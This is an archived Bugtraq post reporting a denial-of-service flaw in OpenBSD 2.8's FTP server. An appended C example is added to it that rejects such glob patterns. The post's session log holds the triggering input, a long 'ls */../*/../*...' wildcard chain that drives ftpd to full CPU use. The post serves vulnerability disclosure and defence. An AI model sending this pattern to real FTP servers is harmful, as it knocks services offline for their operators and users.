Bugtraq mailing list archives

Multiple vendors FTP denial of service


From: Peter Timothey Hessler <phessler () paychex com>
Date: Tue, 20 Mar 2001 08:38:31 -0800

OpenBSD 2.8 (from CD) goes to 100% CPU.  Just ftpd, sshd and telnetd
running.
ftpd ran from /etc/rc; shell is bash.  Relevant system info: Pentium 133,
32Meg RAM, 4Gig hard drive, 100baseT NIC.


Connected to 127.0.0.1.
220 phobos FTP server (Version 6.5/OpenBSD) ready.
Name (127.0.0.1:luser): luser
331 Password required for luser.
Password:
230 User luser logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
(pause for approx. 120 seconds)
229 Entering Extended Passive Mode (|||10965|)
421 Service not available, remote server has closed connection.
ftp>

After ftpd is using >90% CPU, I can still log in and work like normal,
with a small noticeable delay.

--
Peter Hessler
Paychex Inc. MMS Pleasanton Branch
Tech Support 925-463-6500
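
An added example, not part of the original post and not code from OpenBSD or any ftpd: a check a server could run on a listing argument before expanding it, refusing the `*/..` shape used in the session above. It assumes the CPU time goes into glob expansion of that argument; check_list_pattern, the verdict names and both limits are hypothetical.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical policy limits, not taken from any ftpd. */
#define MAX_PATTERN_LEN   256
#define MAX_WILD_SEGMENTS 3

enum pat_verdict { PAT_OK, PAT_TOO_LONG, PAT_TOO_MANY_WILD, PAT_WILD_THEN_DOTDOT };

/* True if the path segment s[0..len) holds an unescaped glob metacharacter. */
static bool segment_is_wild(const char *s, size_t len)
{
    for (size_t i = 0; i < len; i++) {
        if (s[i] == '\\' && i + 1 < len) { i++; continue; }
        if (strchr("*?[{", s[i]) != NULL)
            return true;
    }
    return false;
}

/* Walk the pattern one '/'-separated segment at a time.  A ".." that follows
 * a wildcard segment sends the matcher back up from every directory the
 * wildcard matched, so each such pair multiplies the work; refuse it. */
enum pat_verdict check_list_pattern(const char *pattern)
{
    size_t wild = 0;

    if (strlen(pattern) > MAX_PATTERN_LEN)
        return PAT_TOO_LONG;
    for (const char *p = pattern; *p != '\0'; ) {
        size_t len = strcspn(p, "/");
        if (len == 2 && p[0] == '.' && p[1] == '.') {
            if (wild > 0)
                return PAT_WILD_THEN_DOTDOT;
        } else if (segment_is_wild(p, len) && ++wild > MAX_WILD_SEGMENTS) {
            return PAT_TOO_MANY_WILD;
        }
        p += len;
        while (*p == '/')
            p++;
    }
    return PAT_OK;
}

int main(void)
{
    /* The argument from the session above. */
    printf("%d\n", check_list_pattern("*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*"));
    return 0;
}
```

A server would call the check before any expansion and answer with an error reply for every verdict other than PAT_OK.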

